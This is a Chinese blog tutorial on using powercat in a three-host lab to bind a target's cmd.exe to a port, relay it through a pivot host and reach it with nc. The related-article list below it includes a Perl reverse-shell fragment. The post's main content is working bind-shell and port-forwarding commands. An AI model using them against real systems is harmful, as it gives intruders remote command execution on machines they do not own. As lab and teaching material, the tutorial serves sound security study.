内网渗透----powercat工具使用

最新推荐文章于 2024-05-12 09:52:53 发布
最新推荐文章于 2024-05-12 09:52:53 发布
阅读量265 收藏
点赞数
分类专栏: 内网渗透 工具 文章标签: 网络安全 渗透测试 windows powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32731075/article/details/118093744
版权
本文介绍了如何使用Powercat工具进行内网渗透,通过三台设备(靶机、跳板机、攻击机)设置端口转发,实现对靶机cmd.exe的远程访问。首先在各设备上准备好环境,然后在靶机上启动监听,跳板机转发靶机的端口,最后攻击机通过连接跳板机获取靶机的命令行控制。
摘要由CSDN通过智能技术生成

内网渗透----powercat工具使用

一、环境准备

1.1 设备准备

使用powercat进行端口转发,我们需要三台设备

  • 靶机,ip: 192.168.0.100
  • 跳板机,ip:192.168.248.144
  • 攻击机,ip:192.168.248.201

1.2 软件准备

powercat下载地址


以管理员身份运行poweshell
然后执行命令

set-executionpolicy remotesigned #接着输入y回车 允许导入脚本

然后执行

Import-module E:\securityTools\powercat-master\powercat.ps1 #导入powercat

二、使用方法

靶机上执行

powercat -l -v -p 7777 -e cmd.exe

在这里插入图片描述

将自己的cmd.exe转发到自己的7777端口,等待别人来连接

跳板机上执行

powercat -l -v -p 8888 -r tcp:192.168.0.100:7777

在这里插入图片描述

访问靶机的7777端口获得cmd.exe,然后转发给本机的8888端口

攻击机上执行

nc -v 192.168.248.144 8888

在这里插入图片描述

连接跳板机的8888端口获得靶机的cmd.exe

Iwanturoot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试笔记】之【内网渗透——传输层隧道(PowerCat使用:正反向shell、文件传输、dns隧道、生成powershell payload、内网转发)】
AA8j的博客
10-22 742
写在前面:PowerCatPowerShell版本的nc,主要用于windows平台。 1 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) DC(内网地址:10.1.1.2) 2 下载与部署 2.1 下载 下载地址:https://github.com/besimorhino/powerc
【内网学习笔记】8、powercat使用
TeamsSix 的 CSDN 空间
06-01 522
1、下载安装 powercat powercat 可以视为 nc 的 powershell 版本,因此也可以和 nc 进行连接。 powercat 可在 github 进行下载,项目地址为:https://github.com/besimorhino/powercat 下载下来 powercat.ps1 文件后,直接导入即可 Import-Module .\powercat.ps1 如果提示未能加载指定模块,则可能是权限问题,可以参照之前写的 【内网学习笔记】2、PowerShell 文章中的方法对其赋
内网工具powercat使用(附内网环境实现)
markecheng的博客
12-07 727
前言 Powercat功能也是非常的强大,同nc都是传输层的内网利用工具PowerCat可以说是powershell版本的nc,PoweCat可以通过执行命令回到本地执行,也可以使用远程权限执行,这次我们实现 实验拓扑图如: 我们的主要目标过程是:使用kali攻击机、windows 2008 R2、以及windows 7 三台电脑来实现powerCat常用功能,以及natcat正反向连接powercat Kali安装powercat: git clone https://github.com/besim
powercat工具详细分析
weixin_34128411的博客
09-18 2450
本文讲的是powercat工具详细分析,这个工具出来两年了,但是好像很少人知道他。国外的大牛们用的比较多,国内的文章出现powercat关键字的寥寥无几,更别说有这款工具的详细用法了。 0x01 powercat简介 是NetCatPowershell版本。作者的介绍也是这样写的,但是我觉得,powercat不管怎么样,也有比NetCat强的...
内网渗透综合实验.docx
08-29
本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据交换的过程。在本实验...
内网渗透课实验—传输层隧道通信.docx
08-29
传输层隧道通信是内网渗透实验中的一种重要技术,通过使用 powercat 和 ncpowercat 工具,我们可以实现远程连接和数据传输。同时,我们还可以使用桥接模式来实现远程连接,并使用 Linux 文本编辑器来显示行号。
powercat.ps1
09-23
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash...[ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
正向连接与反向连接1
08-08
通过上述步骤,我们可以清晰地了解如何使用Powercat结合nc来实现这两种连接方式。对于网络安全领域的专业人士而言,熟练掌握这些技能是非常必要的。 **参考资料:** - [FreeBuf文章]...
PowerCat 介绍
f_carey的博客
10-17 951
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PowerCat 介绍1 PowerCat 基础2 实验环境3 利用 NC 正向连接 PowerCat4 利用 NC 反向连接 PowerCat5 利用 PowerCat 返回 PowerShell6 利用 PowerCat 生成 Payload6.1 正向 Payload6.2 反向 Payload7 利用.
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 242
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shell(windows-linux)powercat 反向shell(windows-linux)powercat 反向powershell(w...
人生苦短。我要渗透!(内网渗透之隐藏通信隧道技术)
MachineGunJoe666
06-21 574
目录 前言 何为隐藏通信隧道技术? 意义 简介 常见隧道 网络层 传输层 应用层 写在后面 参考资料: 前言 前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。 何为隐藏通信隧道技术? 意义 当我们成功杀入内网并完成信息收集后,下一步要进行的就是判断内网的连通性(也就是各种各样的流量包能否出的去、进的来),隐藏通信隧道技术通常用于在访问受限的内网环境中完成内网之内、内网与公网之间安全、稳定的数据传输。 简介 在最简单的情况下,两台主机之间..
Powercat:强大的 PowerShell 版 Netcat 工具
最新发布
gitblog_00040的博客
05-12 443
Powercat:强大的 PowerShell 版 Netcat 工具 powercatnetshell features all in version 2 powershell项目地址:https://gitcode.com/gh_mirrors/po/powercat 项目介绍 Powercat 是一个功能齐全的 PowerShell 实现版的 Netcat。它允许你在 PowerShell...
工具powercat使用教程
shy的博客
10-06 3313
下载 地址:https://github.com/besimorhino/powercat 运行 使用: 由于PowerCat是NetCatPowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。 kali:192.168.206.128 win10:192.168.206.1 -eExecute. Specify the name of the process to start. 运行。开启运行一个程序 .
powerCat进行常规tcp端口转发
weixin_30312659的博客
04-03 173
实战中,我们也会遇到需要我们进行端口转发的情况,比如已经拿下的目标机1是在dmz区,而目标1所在内网的其他目标只能通过目标1去访问,这时候我们就需要端口转发或者代理来进行后渗透。这次就要介绍一个加强版的nc,基于powershell的后渗透工具 Powercat 下载地址:Lhttps://github.com/besimorhino/powercat 0x01 power...
windows系统内实现端口转发
weixin_30270561的博客
12-18 521
  经过在网上搜索,发现windows系统,包括xp 2003,2008、2016等,netsh工具都自带portproxy功能。目前只支持tcp协议的端口转发,前提需要作为portproxy的主机需要安装IPV6,安装可以不启用IPV6。A.配置方法假定需要通过192.168.1.8的1212端口连接192.168.1.8的1313端口,则需要在192.168.1.8主机的命令行输入如下语句-...
隐藏通信隧道技术(下)
LJH1999ZN的博客
04-08 4434
一、传输层隧道技术 1.Netcat获取shell(反向shell) 第一种:如果目标主机安装nc 在本地监听5555端口 在目标主机上输入一下payload Socket;$i="10.2.1.170";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(S.
Powercat.ps1脚本的用法
谢公子的博客
12-04 2320
目录 PowerCat的用法 正向连接(Windows连接Kali) Windows之间互弹shell 方法一: 方法二: PowerCat是NetcatPowershell版本,作者是这么介绍的,项目地址:https://github.com/besimorhino/powercat PowerCat的用法 参数的意义 -l 监听一个连接 ...
内网渗透-Windows内网渗透
lza20001103的博客
08-15 1575
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值